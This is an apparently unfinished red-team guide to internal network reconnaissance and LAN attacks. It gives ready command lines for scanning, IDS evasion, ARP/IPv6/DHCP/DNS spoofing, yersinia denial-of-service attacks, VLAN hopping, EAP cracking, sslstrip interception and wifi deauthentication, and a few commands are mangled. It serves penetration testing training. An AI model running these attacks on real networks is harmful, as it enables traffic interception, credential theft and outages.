Red Team Guide: Internal Recon (WIP)

Contents

• Introduction
• Scanning Hosts
  • ICMP
  • TCP
  • UDP
  • SCTP
  • IDS and IPS Evasion
  • Revealing Internal IP Addresses
• Scanning Hosts From the Inside
  • Passive
  • Active
  • Active ICMP
  • Wake on Lan
• Sniffing
  • TCPDump
  • Bettercap2
  • Wireshark
  • Capturing Credentials
• LAN Attacks
  • ARP Spoofing
  • MAC Flooding - CAM Overflow
  • 802.1Q VLAN
  • STP Attacks
  • CDP Attacks
  • DHCP
  • EAP
  • HSRP and VRRP
  • RIP
  • OSPF
• Spoofing
  • ARP Spoofing
  • ICMPRedirect
  • DNS Spoofing
  • Local Gateways
  • Spoofing LLMNR, NBT-NS, and mDNS
  • Spoofing WPAD
  • Spoofing SSDP and UPnP Devices
  • IPv6 Neighbor Spoofing
  • IPv6 Router Advertisement Spoofing/Flooding
  • IPv6 DHCP Spoofing
• Internet Attacks
  • sslStrip
  • sslStrip+ and dns2proxy for bypassing HSTS
• TCP Listen in port
• TCP + SSL Listen in port
• Bettercap 2
  • Active Discovery Notes
  • ARP Discover
  • mDNS (multicast DNS)
  • NBNS (NetBios Name Server)
  • SSDP (Simple Service Discovery Protocol)
  • WSD (Web Service Discovery)

Introduction

Note: This article is work in progress.

In this phase we are going to:

• Discover hosts from outside
• Discover hosts from inside

Scanning Hosts

ICMP

This is the easiest and fastest way to discover if a host is up or not. You could try to send some ICMP packets and expect responses. The easiest way is just sending an echo request and expect from the response.

ping -c 1 <IP> # 1 echo request to a host
nmap -PEPM -sn -n <IP>/<CIDR> # Send echo, timestamp, and subnet mask requests (this will avoid filters to common ICMP echo request-response)

TCP

• Open port: SYN --> SYN/ACK --> RST
• Closed port: SYN --> RST/ACK
• Filtered port: SYN --> [NO RESPONSE]
• Filtered port: SYN --> ICMP message

# Nmap fast scan for the most 1000tcp ports used
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>
# Nmap fast scan for all the ports
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>
# Nmap fast scan for all the ports slower to avoid failures due to -T4
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>

# Bettercap2 Scan
syn.scan <IP>/<CIDR> 1 10000 # Ports 1-10000

# Masscan
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 <IP>/<CIDR>

UDP

There are 2 options to scan an UDP port:

• Send a UDP packet and check for the response ICMP unreachable if the port is closed (in several cases ICMP will be filtered so you won't receive any information inf the port is close or open).
• Send a formatted datagrams to elicit a response from a service (e.g., DNS, DHCP, TFTP, and others, as listed in nmap-payloads). If you receive a response, then, the port is open.

nmap will mix both options using -sV (UDP scans are very slow), but notice that UDP scans are slower than TCP scans.

# Check if any of the most common udp services is running
udp-proto-scanner.pl <IP>
# Nmap fast check if any of the 100 most common UDP services is running
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
# Nmap check if any of the 100 most common UDP services is running and launch defaults scripts
nmap -sU -sV -sC -n -F -T4 <IP>
# Nmap "fast" top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time

SCTP

SCTP sits alongside TCP and UDP. Intended to provide transport of telephony data over IP, the protocol duplicates many of the reliability features of Signaling System 7 (SS7), and underpins a larger protocol family known as SIGTRAN. SCTP is supported by operating systems including IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS, and VxWorks. Two different scans for SCTP are offered by nmap: -sY and -sZ.

# Nmap fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>
# Nmap all SCTP scan
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>

IDS and IPS Evasion

TTL Manipulation

Send some packets with a TTL enough to arrive to the IDS/IPS but not enough to arrive to the final system. And then, send another packets with the same sequences as the other ones so the IPS/IDS will think that they are repetitions and won't check them, but indeed they are carrying the malicious content.

Nmap option: --ttlvalue <value>

Avoiding signatures

Just add garbage data to the packets so the IPS/IDS signature is avoided.

Nmap option: --data-length 25

Fragmented Packets

Just fragment the packets and send them. If the IDS/IPS doesn't have the ability to reassemble them, they will arrive to the final host.

Nmap option: -f

Invalid checksum

Sensors usually don't calculate checksum for performance reasons. So an attacker can send a packet that will be interpreted by the sensor but rejected by the final host. Example: Send a packet with the flag RST and a invalid checksum, so then, the IPS/IDS may thing that this packet is going to close the connection, but the final host will discard the packet as the checksum is invalid.

Uncommon IP and TCP options

A sensor might disregard packets with certain flags and options set within IP and TCP headers, whereas the destination host accepts the packet upon receipt.

Overlapping

It is possible that when you fragment a packet, some kind of overlapping exists between packets (maybe first 8 bytes of packet 2 overlaps with last 8 bytes of packet 1, and 8 last bytes of packet 2 overlaps with first 8 bytes of packet 3). Then, if the IDS/IPS reassembles them in a different way than the final host, a different packet will be interpreted.

• BSD: It has preference for packets with smaller offset. For packets with same offset, it will choose the first one.
• Linux: Like BSD, but it prefers the last packet with the same offset.
• First (Windows): First value that comes, value that stays.
• Last (cisco): Last value that comes, value that stays.

Tools

• https://github.com/vecna/sniffjoke

Revealing Internal IP Addresses

Misconfigured routers, firewalls, and network devices sometimes respond to network probes using nonpublic source addresses. You can use tcpdump used to identify packets received from private addresses during testing. In this case, the eth2 interface in Kali Linux is addressable from the public Internet (If you are behind a NAT of a Firewall this kind of packets are probably going to be filtered).

tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64

Scanning Hosts From the Inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed.

Passive

You can use these tools to passively discover hosts inside a connected network.

netdiscover -p
p0f -i eth0 -p -o /tmp/p0f.log
# Bettercap2
net.recon on/off
net.show
set net.show.meta true #more info

Active

Note that the previous techniques can be also applied here. But, as you are in the same network as the other hosts, you can do more things.

# ARP discovery
nmap -sn <Network> # ARP Requests (Discover IPs)
netdiscover -r <Network> # ARP requests (Discover IPs)

# NBT discovery
nbtscan -r 192.168.0.1/24 # Search in Domain

# Bettercap2 (By default ARP requests are sent)
net.probe on/off # Activate all service discover and ARP
net.probe.mdns # Search local mDNS services (Discover local)
net.probe.nbns # Ask for NetBios name (Discover local)
net.probe.upnp # Search services (Discover local)
net.probe.wsd # Search Web Services Discovery (Discover local)
net.probe.throttle 10 # 10ms between requests sent (Discover local)

# IPv6
alive6 <IFACE> # Send a pingv6 to multicast.

Active ICMP

Note that the previous techniques can be also applied here. But, as you are in the same network as the other hosts, you can do more things.

• If you ping a subnet broadcast address the ping should be arrive to each host and they could respond to you: ping -b 10.10.5.255
• Pinging the network broadcast address you could even find hosts inside other subnets: ping -b 255.255.255.255
• Use the -PEPM flag of nmap to perform host discovery sending ICMPv4 echo, timestamp, and subnet mask requests: nmap -PEPM -sn –vvv -n 10.12.5.0/24

Wake on Lan

Wake on Lan is used to turn on computers through a network message. The magic packet used to turn on the computer is only a packet where a MAC Dst is provided and then it is repeated 16 times inside the same paket. Then this kind of packets are usually sent in an ethernet 0x0842 or in a UDP packet to port 9. If no [MAC] is provided, the packet is sent to broadcast ethernet (and the broadcast MAC will be the one being repeated).

# WOL (without MAC is used ff:...:ff)
wol.eth [MAC] # Send a WOL as a raw ethernet packet of type 0x0847
wol.udp [MAC] # Send a WOL as an IPv4 broadcast packet to UDP port 9
# Bettercap2 can also be used for this purpose

Sniffing

With sniffing you can learn details of IP ranges, subnet sizes, MAC addresses, and hostnames by reviewing captured frames and packets. If the network is misconfigured or switching fabric under stress, attackers can capture sensitive material via passive network sniffing. If a switched Ethernet network is configured properly, you will only see broadcast frames and material destined for your MAC address.

TCPDump

sudo tcpdump -i <INTERFACE> udp port 53 # Listen to DNS request to discover what is searching the host
tcpdump -i <IFACE> icmp # Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"

Bettercap2

net.sniff on
net.sniff stats
net.sniff.output #Output file
net.sniff.local #Accept packets from this machine
net.sniff.filter
net.sniff.regexp

Wireshark

100%.

Capturing Credentials

Tools to parse credentials from a pcap file or a live interface:

• https://github.com/lgandx/PCredz

LAN Attacks

ARP Spoofing

ARP Spoofing consist on sending gratuitous ARPResponses to indicate that the IP of a machine has the MAC of our device. Then, the victim will change the ARP table and will contact our machine every time it wants to contact the IP spoofed.

Bettercap2

arp.spoof on
arp.ban on # No ipv4-redirect
arp.spoof.targets
arp.spoof.whitelist
arp.spoof.internal #Spoofed local connections (by default only Victim <--> Gateway

Arpspoof

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1

MAC Flooding - CAM Overflow

Overflow the switch’s CAM table sending a lot of packets with different source mac address. When the CAM table is full the switch start behaving like a hub (broadcasting all the traffic).

macof -i <interface>

In modern switches this vulnerability has been fixed.

802.1Q VLAN

Dynamic Trunking

Many switches support the Dynamic Trunking Protocol (DTP) by default, however, which an adversary can abuse to emulate a switch and receive traffic across all VLANs. The tool dtpscan.sh can sniff an interface and reports if switch is in Default mode, trunk, dynamic, auto or access mode (this is the only one that would avoid VLAN hopping). The tool will indicate if the switch is vulnerable or not.

If it was discovered that the the network is vulnerable, you can use Yersinia to launch an "enable trunking" using protocol "DTP" and you will be able to see network packets from all the VLANs.

apt-get install yersinia # Installation
sudo apt install kali-linux-large # Another way to install it in Kali
yersinia -I # Interactive mode
# In interactive mode you will need to select a interface first
# Then, you can select the protocol to attack using letter "g"
# Finally, you can select the attack using letter "x"

yersinia -G # For graphic mode

Attacking specific VLANs

Once you known VLAN IDs and IPs values, you can configure a virtual interface to attack a specific VLAN.

If DHCP is not available, then use ifconfig to set a static IP address.

root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
root@kali:~# dhclient eth1.250
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~# ifconfig eth1.250
eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
          inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
          inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:19 errors:0 dropped:0 overruns:0 frame:0
          TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)
root@kali:~# arp-scan -I eth1.250 10.121.5.0/24

# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up

Automatic VLAN Hopper

The discussed attack of Dynamic Trunking and creating virtual interfaces an discovering hosts inside other VLANs are automatically performed by the tool: https://github.com/nccgroup/vlan-hopping---frogger.

Double Tagging

If an attacker knows the value of the MAC, IP and VLAN ID of the victim host, he could try to double tag a frame with its designated VLAN and the VLAN of the victim and send a packet. As the victim won't be able to connect back with the attacker, so the best option for the attacker is communicate via UDP to protocols that can perform some interesting actions (like SNMP).

Another option for the attacker is to launch a TCP port scan spoofing an IP controlled by the attacker and accessible by the victim (probably through internet). Then, the attacker could sniff in the second host owned by him if it receives some packets from the victim.

To perform this attack you could use scapy: pip install scapy.

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Layer 3 Private VLAN Bypass

In guest wireless networks and other environments, private VLAN (also known as port isolation) settings are used to prevent peers from interacting (i.e., clients connect to a wireless access point but cannot address one another). Depending on network ACLs (or lack thereof), it might be possible to send IP packets up to a router, which are then forwarded back to a neighbouring peer.

This attack will send a specially crafted packet to the IP of a client but with the MAC of the router. Then, the router will redirect the packet to the client. As in Double Tagging Attacks you can exploit this vulnerability by controlling a host accessible by the victim.

STP Attacks

If you cannot capture BPDU frames on your interfaces, it is unlikely that you will succeed in an STP attack.

STP BPDU DoS

Sending a lot of BPDUs TCP (Topology Change Notification) or Conf (the BPDUs that are sent when the topology is created) the switches are overloaded and stop working correctly.

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

STP TCP Attack

When a TCP is sent, the CAM table of the switches will be deleted in 15s. Then, if you are sending continuously this kind of packets, the CAM table will be restarted continuously (or every 15segs) and when it is restarted, the switch behaves as a hub.

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

STP Root Attack

The attacker simulates the behaviour of a switch to become the STP root of the network. Then, more data will pass through him. This is interesting when you are connected to two different switches.

This is done by sending BPDUs CONF packets saying that the priority value is less than the actual priority of the actual root switch.

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

If the attacker is connected to 2 switches he can be the root of the new tree and all the traffic between those switches will pass through him (a MITM attack will be performed).

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

CDP Attacks

CISCO Discovery Protocol is the protocol used by CISCO devices to talk among them, discover who is alive and what features does they have. You can make a DoS attack to a CISCO switch by exhausting the device memory simulating real CISCO devices.

You could use Yersina to capture CDP frames and show the information.

sudo yersinia cdp -attack 1 #DoS Attack simulating new CISCO devices
sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

VoIP Attacks

Although intended for use by the employees’ Voice over Internet Protocol (VoIP) phones, modern VoIP devices are increasingly integrated with IoT devices. Many employees can now unlock doors using a special phone number, control the room’s thermostat.

The tool voiphopper mimics the behavior of a VoIP phone in Cisco, Avaya, Nortel, and Alcatel-Lucent environments. It automatically discovers the correct VLAN ID for the voice network using one of the device discovery protocols it supports, such as the Cisco Discovery Protocol (CDP), the Dynamic Host Configuration Protocol (DHCP), Link Layer Discovery Protocol Media Endpoint Discovery (LLDP-MED), and 802.1Q ARP.

VoIP Hopper supports three CDP modes. The sniff mode inspects the network packets and attempts to locate the VLAN ID. To use it, set the -c parameter to 0. The spoof mode generates custom packets similar to the ones a real VoIP device would transmit in the corporate network. To use it, set the -c parameter to 1. The spoof with a pre-madepacket mode sends the same packets as a Cisco 7971G-GE IP phone. To use it, set the -c parameter to 2.

We use the last method because it’s the fastest approach. The -i parameter specifies the attacker’s network interface, and the -E parameter specifies the name of the VOIP device being imitated. We chose the name SEP001EEEEEEEEE, which is compatible with the Cisco naming format for VoIP phones. The format consists of the word "SEP" followed by a MAC address. In corporate environments, you can imitate an existing VoIP device by looking at the MAC label on the back of the phone; by pressing the Settings button and selecting the Model Information option on the phone’s display screen; or by attaching the VoIP device’s Ethernet cable to your laptop and observing the device’s CDP requests using Wireshark.

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

If the tool executes successfully, the VLAN network will assign an IPv4 address to the attacker’s device.

DHCP

Enumeration

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

Two types of DoS could be performed against DHCP servers. The first one consists on simulate enough fake hosts to use all the possible IP addresses.

This attack will work only if you can see the responses of the DHCP server and complete the protocol (Discover (Comp) --> Offer (server) --> Request (Comp) --> ACK (server)). For example, this is not possible in Wifi networks.

Another way to perform a DHCP DoS is to send a DHCP-RELEASE packet using as source code every possible IP. Then, the server will think that everybody has finished using the IP.

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

A more automatic way of doing this is using the tool DHCPing.

You could use the mentioned DoS attacks to force clients to obtain new leases within the environment, and exhaust legitimate servers so that they become unresponsive. So when the legitimate try to reconnect, you can server malicious values mentioned in the next attack.

EAP

Here are some of the attack tactics that can be used against 802.1X implementations:

• Active brute-force password grinding via EAP.
• Attacking the RADIUS server with malformed EAP content **(exploits).
• EAP message capture and offline password cracking (EAP-MD5 and PEAP).
• Forcing EAP-MD5 authentication to bypass TLS certificate validation.
• Injecting malicious network traffic upon authenticating using a hub or similar.

If the attacker if between the victim and the authentication server, he could try to degrade (if necessary) the authentication protocol to EAP-MD5 and capture the authentication attempt. Then, he could brute-force this using:

eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt

HSRP and VRRP

Hot Standby Routing Protocol (HSRP) and the Virtual Router Redundancy Protocol (VRRP) are used in high-availability environments to provide failover support. Routers send packets to local multicast groups announcing configuration and priority details.

HSRP is a proprietary Cisco protocol with no RFC, whereas VRRP is standardized. To evaluate HSRP and VRRP support within an environment, use a network sniffer to capture the management traffic. You can use a number of tools to craft HSRP messages (including Scapy and Yersinia), but only Loki provides VRRP support at this time.

For more information about how to attack this protocols go to the book Network Security Assessment: Know Your Network (3rd edition)

RIP

Three versions of the Routing Information Protocol (RIP) exist—RIP, RIPv2, and RIPng. RIP and RIPv2 use UDP datagrams sent to peers via port 520, whereas RIPng broadcasts datagrams to UDP port 521 via IPv6 multicast. RIPv2 introduced MD5 authentication support. RIPng does not incorporate native authentication; rather, it relies on optional IPsec AH and ESP headers within IPv6.

For more information about how to attack this protocol go to the book Network Security Assessment: Know Your Network (3rd edition).

EIGRP

The Enhanced Interior Gateway Routing Protocol (EIGRP) is Cisco proprietary and can be run with or without authentication. Coly supports capture of EIGRP broadcasts and injection of packets to manipulate routing configuration.

For more information about how to attack this protocol go to the book Network Security Assessment: Know Your Network (3rd edition).

OSPF

Most Open Shortest Path First (OSPF) implementations use MD5 to provide authentication between routers. Loki and John the Ripper can capture and attack MD5 hashes to reveal the key, which can then be used to advertise new routes. The route parameters are set by using the Injection tab, and the key set under Connection.

For more information about how to attack this protocol go to the book Network Security Assessment: Know Your Network (3rd edition).

Spoofing

The attacker configures all the network parameters (GW, IP, DNS) of the new member of the network sending fake DHCP responses.

Ettercap
yersinia dhcp -attack 2 # More parameters are needed

ARP Spoofing

Check the previous section.

ICMPRedirect

ICMP Redirect consist on sending an ICMP packet type 1 code 5 that indicates that the attacker is the best way to reach an IP. Then, when the victim wants to contact the IP, it will send the packet through the attacker.

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS Spoofing

The attacker will resolve some (or all) the domains that the victim ask for.

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

Configure own DNS with dnsmasq.

apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf # Create dnsmasq.confecho "127.0.0.1 domain.example.com" > dnsmasq.hosts # Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

Local Gateways

Multiple routes to systems and networks often exist. Upon building a list of MAC addresses within the local network, use gateway-finder.py to identify hosts that support IPv4 forwarding.

root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.0.100 00:13:72:09:ad:76 Dell Inc.
10.0.0.200 00:90:27:43:c0:57 INTEL CORPORATION
10.0.0.254 00:08:74:c0:40:ce Dell Computer Corp.
root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in hosts.txt
[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]

Spoofing LLMNR, NBT-NS, and mDNS

Microsoft systems use Link-Local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service (NBT-NS) for local host resolution when DNS lookups fail. Apple Bonjour and Linux zero-configuration implementations use Multicast DNS (mDNS) to discover systems within a network. These protocols are unauthenticated and broadcast messages over UDP; thus, attackers can exploit them to direct users to malicious services.

// TODO: You can impersonate services that are searched by hosts using Responder to send fake responses. Read here more information about how to impersonate services with responder.

Spoofing WPAD

Many browsers use Web Proxy Auto-Discovery (WPAD) to load proxy settings from the network. A WPAD server provides client proxy settings via a particular URL (e.g., http://wpad.example.org/wpad.dat) upon being identified through any of the following:

• DHCP, using a code 252 entry34
• DNS, searching for the wpad hostname in the local domain
• Microsoft LLMNR and NBT-NS (in the event of DNS lookup failure)

Responder automates the WPAD attack—running a proxy and directing clients to a malicious WPAD server via DHCP, DNS, LLMNR, and NBT-NS.

// TODO: Read here more information about how to impersonate services with responder.

Spoofing SSDP and UPnP Devices

// TODO: You can offer different services in the network to try to trick a user to enter some plain-text credentials. More information about this attack in Spoofing SSDP and UPnP Devices.

IPv6 Neighbor Spoofing

This attack is very similar to ARP Spoofing but in the IPv6 world. You can get the victim think that the IPv6 of the GW has the MAC of the attacker.

sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> # This option will send the Neighbor Advertisement packet every 2 seconds

IPv6 Router Advertisement Spoofing/Flooding

Some OS configure by default the gateway from the RA packets sent in the network. To declare the attacker as IPv6 router you can use:

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

IPv6 DHCP Spoofing

By default some OS try to configure the DNS reading a DHCPv6 packet in the network. Then, an attacker could send a DHCPv6 packet to configure himself as DNS. The DHCP also provides an IPv6 to the victim.

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

Internet Attacks

sslStrip

Basically what this attack does is, in case the user try to access a HTTP page that is redirecting to the HTTPS version. sslStrip will maintain a HTTP connection with the client and a HTTPS connection with the server so it ill be able to sniff the connection in plain text.

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

More info here.

sslStrip+ and dns2proxy for bypassing HSTS

The difference between sslStrip+ and dns2proxy against sslStrip is that they will redirect for example www.facebook.com to wwww.facebook.com (note the extra "w") and will set the address of this domain as the attacker IP. This way, the client will connect to wwww.facebook.com (the attacker) but behind the scenes sslstrip+ will maintain the real connection via https with www.facebook.com.

The goal of this technique is to avoid HSTS because wwww.facebook.com won't be saved in the cache of the browser, so the browser will be tricked to perform facebook authentication in HTTP.

Note that in order to perform this attack the victim has to try to access initially to http://www.faceook.com and not https. This can be done modifying the links inside an http page.

More info here, here and here.

sslStrip or sslStrip+ doesn't work anymore. This is because there are HSTS rules presaved in the browsers, so even if it's the first time that a user access an "important" domain he will access it via HTTPS. Also, notice that the presaved rules and other generated rules can use the flag includeSubdomains so the wwww.facebook.com example from before won't work anymore as facebook.com uses HSTS with includeSubdomains.

TCP Listen in port

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

TCP + SSL Listen in port

Generate keys and self-signed certificate

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

Listen using certificate.

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

Listen using certificate and redirect to the hosts.

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 openssl-connect:[SERVER]:[PORT],verify=0

Some times, if the client checks that the CA is a valid one, you could serve a certificate of other hostname signed by a CA.

Another interesting test, is to serve a certificate of the requested hostname but self-signed.

Other things to test is to try to sign the certificate with a valid certificate that it is not a valid CA. Or to use the valid public key, force to use an algorithm as diffie hellman (one that do not need to decrypt anything with the real private key) and when the client request a probe of the real private key (like a hash) send a fake probe and expect that the client does not check this.

Bettercap 2

# Events
events.stream off #Stop showing events
events.show #Show all events
events.show 5 #Show latests 5 events
events.clear

# Ticker (loop of commands)
set ticker.period 5; set ticker.commands "wifi.deauth DE:AD:BE:EF:DE:AD"; ticker on

# Caplets
caplets.show
caplets.update

# Wifi
wifi.recon on
wifi.deauth BSSID
wifi.show

# Fake wifi
set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap

Active Discovery Notes

Take into account that when a UDP packet is sent to a device that do not have the requested port an ICMP (Port Unreachable) is sent.

ARP Discover

ARP packets are used to discover wich IPs are being used inside the network. The PC has to send a request for each possible IP address and only the ones that are being used will respond.

mDNS (multicast DNS)

Bettercap send a MDNS request (each X ms) asking for _services_.dns-sd._udp.local the machine that see this paket usually answer this request. Then, it only searchs for machine answering to "services".

Tools:

• Avahi-browser (--all)
• Bettercap (net.probe.mdns)
• Responder

NBNS (NetBios Name Server)

Bettercap broadcast packets to the port 137/UDP asking for the name "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".

SSDP (Simple Service Discovery Protocol)

Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 1900).

WSD (Web Service Discovery)

Bettercap broadcast WSD packets searching for services (UDP Port 3702).